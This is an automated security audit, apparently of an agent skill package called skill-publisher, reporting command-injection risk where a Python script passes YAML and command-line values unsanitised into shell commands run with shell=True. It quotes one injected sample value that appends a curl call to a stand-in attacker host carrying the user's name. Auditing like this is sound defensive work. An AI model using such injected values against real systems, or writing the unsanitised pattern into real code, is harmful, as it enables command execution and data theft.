skill-publisher
Warn
Audited by Gen Agent Trust Hub on Jun 11, 2026
Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The Python script
scripts/publish_skill.pydefines a helper functionrunthat executes shell commands usingsubprocess.run(..., shell=True). This practice is generally discouraged when dealing with variable input. - [COMMAND_EXECUTION]: Untrusted data extracted from the
SKILL.mdfile being processed (specifically thenamefield in the YAML frontmatter) is interpolated directly into shell command strings. In thecreate_and_pushfunction, the script executesf"gh repo view {github_user}/{name} ...". If a user attempts to publish a skill where thenamefield contains shell metacharacters (e.g.,"myskill; curl attacker.com/$(whoami)"), those commands would be executed with the permissions of the user running the publisher script. - [COMMAND_EXECUTION]: The script similarly interpolates the
skill_dircommand-line argument and thegithub_userinto various shell commands (e.g.,git,gh,npx) without sufficient sanitization, which could lead to command injection if the directory path or username contains malicious sequences.
Audit Metadata